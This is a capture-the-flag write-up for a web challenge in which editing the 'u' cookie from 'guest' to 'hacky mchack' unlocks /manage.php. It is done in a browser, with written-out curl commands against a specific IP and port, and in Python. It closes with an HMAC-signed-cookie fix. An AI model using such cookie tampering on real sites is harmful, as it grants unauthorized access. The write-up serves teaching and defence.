
Chef Hacky McHack

We'll solve this task in 3 ways: from the browser, from the CLI and using Python. That's how good we are!

Virgin: From the Browser

We visit the URL, open the Developer Tools and go over to the "Storage" tab. There we see the server has given us the cookie u=guest.

Hacky McHack - Initial Cookie

Since the challenge is called "Hacky McHack", we set the cookie value to hacky mchack. A new tab, Manage (/manage.php), has now appeared at the top of the page; it can also be found by inspecting the HTML source. We click on it and get the flag.

<ul class="nav-menu list-unstyled">
<li><a href="index.php" class="smoothScroll">Home</a></li>
<li><a href="#about" class="smoothScroll">About</a></li>
<li><a href="#portfolio" class="smoothScroll">Portfolio</a></li>
<li><a href="#journal" class="smoothScroll">Blog</a></li>
<li><a href="#contact" class="smoothScroll">Contact</a></li>
<li><a href="manage.php" class="smoothScroll">Manage</a></li>
</ul>

Chad v1: From the CLI

We use our good friend curl. First, we save the cookies from the initial page into a cookie jar.

root@kali:~# curl -c cookies.txt http://141.85.224.70:8010
[...]

root@kali:~# cat cookies.txt
# Netscape HTTP Cookie File
# https://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

http://141.85.224.70:8010 FALSE / FALSE 1656864260 u guest

Now we edit the file, replacing guest with hacky mchack, and send a GET request to /manage.php.

root@kali:~# sed -i s/guest/hacky\ mchack/ cookies.txt

root@kali:~# curl -b cookies.txt http://141.85.224.70:8010/manage.php

If we didn't want to use the cookie jar, we could have simply looked at the headers sent by the server, then sent the cookie "manually":

root@kali:~# curl -v http://141.85.224.70:8010 > /dev/null  # we don't care about the output
[...]
< HTTP/1.1 200 OK
< Date: Sun, 03 Jul 2022 16:10:51 GMT
< Server: Apache/2.4.38 (Debian)
< X-Powered-By: PHP/7.2.34
< Set-Cookie: u=guest; expires=Sun, 03-Jul-2022 16:11:51 GMT; Max-Age=60

root@kali:~# curl -b 'u=hacky mchack' http://141.85.224.70:8010/manage.php # Notice the Set-Cookie field above
<here we get the flag>

Chad v2: From Python

Simply create a Session object, set the cookie u to hacky mchack, then send a GET request to the /manage.php endpoint.
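
All three approaches work for the same reason: the server decides who may open /manage.php from the u cookie, a value the client fully controls. The following is an added example, not the challenge's code (its PHP source is not shown on this page); the key and function names are assumptions. It puts that trust-the-cookie check beside an HMAC-signed variant that rejects an edited value.

```python
import hashlib
import hmac

# Assumption: illustrative key and names, constructed for this example.
SECRET_KEY = b"constructed-demo-key"
ADMIN_USER = "hacky mchack"


def can_manage_vulnerable(cookies: dict) -> bool:
    """Behaviour the write-up observes: the raw 'u' cookie decides access."""
    return cookies.get("u") == ADMIN_USER


def _tag(user: str) -> str:
    return hmac.new(SECRET_KEY, user.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user: str) -> str:
    """Server side: bind the user name to an HMAC-SHA256 tag."""
    return f"{user}.{_tag(user)}"


def verify_cookie(value: str):
    """Return the user name if the tag matches, otherwise None."""
    user, sep, tag = value.rpartition(".")
    if not sep:
        return None  # untagged value, e.g. a hand-edited 'hacky mchack'
    # Constant-time comparison; bytes so non-ASCII input cannot raise.
    if hmac.compare_digest(tag.encode(), _tag(user).encode()):
        return user
    return None


def can_manage_hardened(cookies: dict) -> bool:
    """Access only when the server itself issued the admin cookie."""
    return verify_cookie(cookies.get("u", "")) == ADMIN_USER


if __name__ == "__main__":
    guest_tag = issue_cookie("guest").rpartition(".")[2]
    cases = {
        "edited plain cookie": ADMIN_USER,
        "admin name with guest's tag": f"{ADMIN_USER}.{guest_tag}",
        "server-issued admin cookie": issue_cookie(ADMIN_USER),
    }
    for label, value in cases.items():
        print(f"{label}: hardened check grants access = "
              f"{can_manage_hardened({'u': value})}")
```

Keeping the role in a server-side session and putting only a random session identifier in the cookie closes the same hole.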